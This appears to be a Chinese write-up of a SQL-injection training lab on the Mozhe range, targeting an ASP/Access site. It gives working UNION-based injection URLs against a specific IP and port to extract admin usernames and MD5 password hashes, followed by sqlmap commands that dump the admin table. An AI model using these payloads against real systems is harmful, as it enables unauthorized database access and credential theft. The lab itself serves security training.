背景介绍
墨者
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
实训目标
1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Access的数据结构;
4.了解字符串的MD5加解密;
解题方向
手工进行SQL注入测试,获取管理密码登录。
判断注入点
http://219.153.49.228:48466/new_list.asp?id=1%20and%201=2
http://219.153.49.228:48466/new_list.asp?id=1%20and%201=1
猜字段
http://219.153.49.228:48466/new_list.asp?id=1%20order%20by%205
字段数为4
猜测表名为admin,列名为username,passwd
http://219.153.49.228:48466/new_list.asp?id=-1%20union%20select%201,username,passwd,4%20from%20admin
得到密码拿去登录发现不对,再拿密码去md5解密登录
利用工具爆破
sqlmap.py -u http://219.153.49.228:48466/new_list.asp?id=1 -tables
sqlmap.py -u http://219.153.49.228:48466/new_list.asp?id=1 -columns -T admin
sqlmap.py -u http://219.153.49.228:48466/new_list.asp?id=1 --dump -T admin -C "passwd,username"